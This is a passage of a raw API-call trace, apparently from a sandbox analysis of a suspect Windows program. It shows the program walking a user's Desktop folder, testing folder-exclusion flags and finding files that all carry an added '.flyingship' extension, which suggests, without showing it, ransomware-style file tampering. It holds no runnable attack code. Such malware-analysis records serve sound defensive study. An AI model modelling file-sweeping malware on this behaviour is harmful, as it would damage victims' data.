(in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcaceccc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xcaceccc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.117] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0xc9dc0080, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9dc0080, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="-bwOHNgAEohzwnBTD", cAlternateFileName="-BWOHN~1")) returned 1 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.117] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.117] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0157.117] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.117] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.118] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.118] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.118] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0xc9dc0080, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9dc0080, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.151] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0xc9dc0080, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9dc0080, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.152] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9818c40, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9818c40, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9864f00, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="BhG Xz5NyPYF_.flyingship.flv", cAlternateFileName="BHGXZ5~2.FLV")) returned 1 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.152] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc98fd480, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc98fd480, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9949740, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x44d0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="bqTv.flyingship.png", cAlternateFileName="BQTVFL~1.PNG")) returned 1 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99e1cc0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc99e1cc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9a540e0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x12680, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="dU_Aud-fZ3ji9.flyingship.ppt", cAlternateFileName="DU_AUD~2.PPT")) returned 1 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9b127c0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9b127c0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9b38920, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x1050, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="I_yvZxV2VbG06XDhaG1Z.flyingship.mp4", cAlternateFileName="I_YVZX~2.MP4")) returned 1 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bd0ea0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9bd0ea0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9c432c0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x3ed0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="VmWpxwQdQUQhtrKz9rx.flyingship.pptx", cAlternateFileName="VMWPXW~2.PPT")) returned 1 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d27b00, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9d27b00, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9d73dc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x68f0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="WWhoeERioUR.flyingship.swf", cAlternateFileName="WWHOEE~2.SWF")) returned 1 [0157.153] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12a006a, ftCreationTime.dwLowDateTime=0x3cee, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x120006b, nFileSizeHigh=0x3cee, nFileSizeLow=0x9ba840, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="WW\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.153] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e90 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba810 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7f8 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7e0 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0157.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e20 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7c8 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7b0 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba798 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1de0 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba858 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba840 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba828 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba888 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba870 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e50 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.158] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e0c340, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9e0c340, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9e7e760, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x12250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="1SXWH1rq8k oa-Gv-.flyingship.wav", cAlternateFileName="1SXWH1~2.WAV")) returned 1 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0157.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x9091f8 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.163] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f3ce40, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9f3ce40, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9fd53c0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdbf0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="4N8tFmD4.flyingship.gif", cAlternateFileName="4N8TFM~1.GIF")) returned 1 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.163] HeapFree (in: hHeap=0x8a0000, 